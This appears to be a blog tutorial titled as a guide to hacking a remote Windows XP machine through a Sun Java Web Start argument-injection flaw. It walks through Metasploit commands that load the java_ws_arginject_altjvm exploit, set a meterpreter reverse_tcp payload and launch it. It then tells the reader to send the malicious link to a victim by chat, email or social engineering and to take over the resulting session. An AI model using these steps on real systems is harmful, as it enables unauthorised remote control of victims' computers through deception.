Hack Remote Windows XP using Sun Java Web Start Plugin Command Line Argument Injection

This module exploits a flaw in the Web Start Plugin component of Sun Java Web Start. The arguments passed to Java Web Start are not properly validated. By passing the lesser known -J option, an attacker can pass arbitrary options directly to the Java runtime. By utilizing the -XXaltjvm option, as discussed by Ruben Santamarta, an attacker can execute arbitrary code in the context of an unsuspecting browser user. This vulnerability was originally discovered independently by both Ruben Santamarta and Tavis Ormandy. Tavis reported that all versions since version 6 Update 10 “are believed to be affected by this vulnerability.” In order for this module to work, it must be run as root on a server that does not serve SMB. Additionally, the target host must have the Web Client service (WebDAV Mini-Redirector) enabled.

Exploit Targets

Java 6 Standard Edition Update 18

Windows XP SP 2


Attacker: Backtrack 5

Victim PC: Windows XP

Open backtrack terminal type msfconsole

Now type use exploit/windows/browser/java_ws_arginject_altjvm

Msf exploit (java_ws_arginject_altjvm)>set payload windows/meterpreter/reverse_tcp

Msf exploit (java_ws_arginject_altjvm)>set lhost (IP of Local Host)

Msf exploit (java_ws_arginject_altjvm)>set srvhost (This must be an address on the local machine)

Msf exploit (java_ws_arginject_altjvm)>exploit

Now an URL you should give to your victim

Send the link of the server to the victim via chat or email or any social engineering technique.

Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID

Leave a Reply

Your email address will not be published. Required fields are marked *